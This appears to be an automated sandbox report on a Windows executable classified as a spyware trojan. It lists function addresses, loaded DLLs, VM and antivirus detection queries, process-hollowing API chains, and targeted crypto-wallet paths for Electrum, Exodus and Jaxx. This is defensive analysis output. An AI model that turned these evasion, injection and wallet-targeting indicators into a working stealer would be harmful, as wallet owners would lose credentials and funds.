            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044C7D01_2_0044C7D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004047E21_2_004047E2
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004437A01_2_004437A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E200D01_2_00E200D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0E0A01_2_00E0E0A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF80901_2_00DF8090
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF40801_2_00DF4080
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1D0801_2_00E1D080
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E008901_2_00E00890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E138901_2_00E13890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E218901_2_00E21890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF58A01_2_00DF58A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1F0601_2_00E1F060
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E040401_2_00E04040
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF60701_2_00DF6070
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0A8201_2_00E0A820
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E090201_2_00E09020
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1A0201_2_00E1A020
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF10001_2_00DF1000
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0C0101_2_00E0C010
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E238131_2_00E23813
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0B1E01_2_00E0B1E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF31F01_2_00DF31F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1F9B01_2_00E1F9B0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E061801_2_00E06180
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E231601_2_00E23160
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF49401_2_00DF4940
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0C9401_2_00E0C940
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFE1701_2_00DFE170
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E229201_2_00E22920
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E191001_2_00E19100
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E3C9081_2_00E3C908
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E101101_2_00E10110
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1F2E01_2_00E1F2E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFF2D01_2_00DFF2D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E052C01_2_00E052C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E19AB01_2_00E19AB0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF22801_2_00DF2280
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E042901_2_00E04290
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFEAA01_2_00DFEAA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E18A501_2_00E18A50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E26A541_2_00E26A54
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E152201_2_00E15220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E16A001_2_00E16A00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E182001_2_00E18200
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E10A101_2_00E10A10
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF52201_2_00DF5220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF92201_2_00DF9220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E073F01_2_00E073F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0F3D01_2_00E0F3D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0ABA01_2_00E0ABA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF63901_2_00DF6390
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E033901_2_00E03390
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0FB701_2_00E0FB70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E113701_2_00E11370
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF83401_2_00DF8340
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1EB401_2_00E1EB40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E103501_2_00E10350
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFC3101_2_00DFC310
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFB3001_2_00DFB300
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0CCE01_2_00E0CCE0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFE4C01_2_00DFE4C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E03CC01_2_00E03CC0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF6C801_2_00DF6C80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E064801_2_00E06480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E154801_2_00E15480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E224801_2_00E22480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E004901_2_00E00490
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E23C901_2_00E23C90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF54A01_2_00DF54A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E15C601_2_00E15C60
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E234771_2_00E23477
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF2C401_2_00DF2C40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0EC401_2_00E0EC40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E18C401_2_00E18C40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E184501_2_00E18450
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E314201_2_00E31420
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E2B41A1_2_00E2B41A
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF5C201_2_00DF5C20
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E235C01_2_00E235C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1F5D01_2_00E1F5D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E055B01_2_00E055B0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1EDB01_2_00E1EDB0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF95801_2_00DF9580
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1DD801_2_00E1DD80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0D5601_2_00E0D560
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E085401_2_00E08540
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0DD501_2_00E0DD50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1FD501_2_00E1FD50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E095001_2_00E09500
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF7D301_2_00DF7D30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFF5301_2_00DFF530
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFAD301_2_00DFAD30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E026F01_2_00E026F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E21EF01_2_00E21EF0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0C6A01_2_00E0C6A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E1B6801_2_00E1B680
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E02E901_2_00E02E90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E186901_2_00E18690
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E22E901_2_00E22E90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF86401_2_00DF8640
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF36401_2_00DF3640
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E06E401_2_00E06E40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E07E501_2_00E07E50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF46601_2_00DF4660
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E076201_2_00E07620
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E00E201_2_00E00E20
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E206201_2_00E20620
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0B6301_2_00E0B630
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E196301_2_00E19630
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF67D01_2_00DF67D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF9FF01_2_00DF9FF0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DF17901_2_00DF1790
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFB7801_2_00DFB780
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E3E7821_2_00E3E782
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E10F801_2_00E10F80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E067901_2_00E06790
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E0FF701_2_00E0FF70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E097201_2_00E09720
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E19F001_2_00E19F00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00DFE7301_2_00DFE730
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 00E34014 appears 34 times
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 0041AEF0 appears 102 times
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 00E2F1CC appears 46 times
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 00E26F60 appears 102 times
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 0040B350 appears 52 times
            Source: SoftWare(1).exeStatic PE information: invalid certificate
            Source: SoftWare(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: SoftWare(1).exeStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00444300 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_00444300
            Source: SoftWare(1).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SoftWare(1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SoftWare(1).exe, 00000001.00000003.1157713865.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SoftWare(1).exeVirustotal: Detection: 42%
            Source: SoftWare(1).exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\SoftWare(1).exeFile read: C:\Users\user\Desktop\SoftWare(1).exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"
            Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"
            Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"Jump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: SoftWare(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E2711A push ecx; ret 0_2_00E2712D
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00EA8FF1 push es; iretd 0_2_00EA8FF2
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004513DA push edx; retf 1_2_004513FE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004554C9 push 00000000h; iretd 1_2_00455520
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00451648 pushad ; retf 1_2_00451689
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00455676 push 00000000h; iretd 1_2_004556EC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00455766 push 00000000h; ret 1_2_00455770
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004517FC push ebx; ret 1_2_00451803
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044F78D push ss; retf 1_2_0044F7AD
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E2711A push ecx; ret 1_2_00E2712D
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00EA8FF1 push es; iretd 1_2_00EA8FF2
            Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SoftWare(1).exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\SoftWare(1).exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeAPI coverage: 9.6 %
            Source: C:\Users\user\Desktop\SoftWare(1).exe TID: 6488Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exe TID: 6732Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E38ECE FindFirstFileExW,0_2_00E38ECE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E38F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00E38F7F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E38ECE FindFirstFileExW,1_2_00E38ECE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E38F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00E38F7F
            Source: SoftWare(1).exe, 00000001.00000003.1325724132.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1325537281.00000000004EC000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326107766.00000000004F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317875278.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326213385.0000000000537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00449B30 LdrInitializeThunk,1_2_00449B30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E26DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E26DE8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E4F1B4 mov edi, dword ptr fs:[00000030h]0_2_00E4F1B4
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E3490C GetProcessHeap,0_2_00E3490C
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E26A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E26A2C
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E26DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E26DE8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E26DDC SetUnhandledExceptionFilter,0_2_00E26DDC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E2EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E2EF1E
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E26A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00E26A2C
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E26DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00E26DE8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E26DDC SetUnhandledExceptionFilter,1_2_00E26DDC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E2EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00E2EF1E

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E4F1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00E4F1B4
            Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Users\user\Desktop\SoftWare(1).exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"Jump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,0_2_00E388F6
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,0_2_00E388AB
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,0_2_00E341F7
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00E3899D
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,0_2_00E38AA3
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00E38238
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,0_2_00E33CFC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,0_2_00E38489
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00E38524
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,0_2_00E387D6
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,0_2_00E38777
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,1_2_00E388F6
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,1_2_00E388AB
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,1_2_00E341F7
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00E3899D
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,1_2_00E38AA3
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00E38238
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,1_2_00E33CFC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,1_2_00E38489
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00E38524
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: GetLocaleInfoW,1_2_00E387D6
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: EnumSystemLocalesW,1_2_00E38777
            Source: C:\Users\user\Desktop\SoftWare(1).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E27827 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E27827
            Source: C:\Users\user\Desktop\SoftWare(1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: SoftWare(1).exe, 00000001.00000003.1317875278.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326213385.0000000000537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\SoftWare(1).exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: SoftWare(1).exe PID: 6460, type: MEMORYSTR
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: SoftWare(1).exe, 00000001.00000003.1241714804.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
